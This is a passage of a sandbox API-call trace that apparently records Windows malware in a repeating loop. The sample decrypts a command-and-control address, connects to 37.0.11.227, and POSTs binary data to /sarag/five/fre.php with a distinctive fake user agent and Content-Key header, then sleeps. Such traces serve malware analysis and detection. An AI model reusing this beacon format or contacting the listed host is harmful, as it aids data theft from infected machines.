hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.372] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0188.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.373] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.373] GetProcessHeap () returned 0x690000 [0188.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.374] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0188.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.377] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0188.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0188.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.379] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0188.379] GetProcessHeap () returned 0x690000 [0188.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0188.379] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3b50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0188.379] GetProcessHeap () returned 0x690000 [0188.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0188.379] socket (af=2, type=1, protocol=6) returned 0x360 [0188.380] connect (s=0x360, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0188.410] FreeAddrInfoW (pAddrInfo=0x6b3b50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0188.410] GetProcessHeap () returned 0x690000 [0188.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0188.410] GetProcessHeap () returned 0x690000 [0188.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0188.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.412] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.412] GetProcessHeap () returned 0x690000 [0188.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0188.412] GetProcessHeap () returned 0x690000 [0188.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0188.412] GetProcessHeap () returned 0x690000 [0188.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0188.412] GetProcessHeap () returned 0x690000 [0188.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0188.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.414] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.414] GetProcessHeap () returned 0x690000 [0188.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0188.414] GetProcessHeap () returned 0x690000 [0188.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0188.415] send (s=0x360, buf=0x6abd08*, len=242, flags=0) returned 242 [0188.416] send (s=0x360, buf=0x6aba40*, len=159, flags=0) returned 159 [0188.416] GetProcessHeap () returned 0x690000 [0188.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0188.416] recv (in: s=0x360, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0188.514] GetProcessHeap () returned 0x690000 [0188.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0188.515] GetProcessHeap () returned 0x690000 [0188.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0188.515] GetProcessHeap () returned 0x690000 [0188.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0188.515] GetProcessHeap () returned 0x690000 [0188.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0188.516] closesocket (s=0x360) returned 0 [0188.516] GetProcessHeap () returned 0x690000 [0188.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0188.517] GetProcessHeap () returned 0x690000 [0188.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.517] GetProcessHeap () returned 0x690000 [0188.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.517] GetProcessHeap () returned 0x690000 [0188.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0188.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10c4) returned 0x360 [0188.538] Sleep (dwMilliseconds=0xea60) [0188.544] GetProcessHeap () returned 0x690000 [0188.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.545] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.568] GetProcessHeap () returned 0x690000 [0188.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0188.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.570] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0188.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.570] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.572] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.572] GetProcessHeap () returned 0x690000 [0188.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0188.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.573] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.574] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0188.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.575] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.575] GetProcessHeap () returned 0x690000 [0188.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.576] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.577] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.577] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.578] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.578] GetProcessHeap () returned 0x690000 [0188.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0188.578] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.579] GetProcessHeap () returned 0x690000 [0188.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0188.579] GetProcessHeap () returned 0x690000 [0188.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.579] GetProcessHeap () returned 0x690000 [0188.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.580] GetProcessHeap () returned 0x690000 [0188.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.594] GetProcessHeap () returned 0x690000 [0188.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0188.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.595] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0188.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.596] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.597] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.597] GetProcessHeap () returned 0x690000 [0188.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0188.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.601] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.603] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0188.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.604] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.604] GetProcessHeap () returned 0x690000 [0188.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.605] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0188.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.607] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0188.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0188.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.611] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0188.611] GetProcessHeap () returned 0x690000 [0188.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0188.611] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2ce0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0188.612] GetProcessHeap () returned 0x690000 [0188.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0188.612] socket (af=2, type=1, protocol=6) returned 0x364 [0188.612] connect (s=0x364, name=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0188.640] FreeAddrInfoW (pAddrInfo=0x6b2ce0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0188.640] GetProcessHeap () returned 0x690000 [0188.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0188.640] GetProcessHeap () returned 0x690000 [0188.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0188.641] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.643] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.643] GetProcessHeap () returned 0x690000 [0188.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0188.643] GetProcessHeap () returned 0x690000 [0188.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0188.644] GetProcessHeap () returned 0x690000 [0188.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0188.644] GetProcessHeap () returned 0x690000 [0188.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0188.645] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.645] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.646] GetProcessHeap () returned 0x690000 [0188.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0188.646] GetProcessHeap () returned 0x690000 [0188.646] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0188.646] send (s=0x364, buf=0x6abd08*, len=242, flags=0) returned 242 [0188.647] send (s=0x364, buf=0x6aba40*, len=159, flags=0) returned 159 [0188.647] GetProcessHeap () returned 0x690000 [0188.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0188.647] recv (in: s=0x364, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0188.727] GetProcessHeap () returned 0x690000 [0188.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0188.729] GetProcessHeap () returned 0x690000 [0188.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0188.731] GetProcessHeap () returned 0x690000 [0188.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0188.732] GetProcessHeap () returned 0x690000 [0188.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0188.732] closesocket (s=0x364) returned 0 [0188.732] GetProcessHeap () returned 0x690000 [0188.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0188.733] GetProcessHeap () returned 0x690000 [0188.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.733] GetProcessHeap () returned 0x690000 [0188.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.734] GetProcessHeap () returned 0x690000 [0188.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0188.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10d0) returned 0x364 [0188.736] Sleep (dwMilliseconds=0xea60) [0188.738] GetProcessHeap () returned 0x690000 [0188.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.749] GetProcessHeap () returned 0x690000 [0188.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0188.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.751] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0188.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.752] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.754] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.754] GetProcessHeap () returned 0x690000 [0188.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0188.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.757] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.757] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0188.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.758] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.758] GetProcessHeap () returned 0x690000 [0188.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0188.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.769] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.770] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.771] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.772] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.772] GetProcessHeap () returned 0x690000 [0188.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0188.772] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.772] GetProcessHeap () returned 0x690000 [0188.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0188.773] GetProcessHeap () returned 0x690000 [0188.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0188.777] GetProcessHeap () returned 0x690000 [0188.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.777] GetProcessHeap () returned 0x690000 [0188.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0188.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.784] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.790] GetProcessHeap () returned 0x690000 [0188.790] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0188.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.791] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0188.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.792] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.792] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.792] GetProcessHeap () returned 0x690000 [0188.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0188.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.794] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0188.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.795] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0188.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.797] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.797] GetProcessHeap () returned 0x690000 [0188.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.798] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0188.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.799] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0188.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.800] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0188.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.800] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0188.800] GetProcessHeap () returned 0x690000 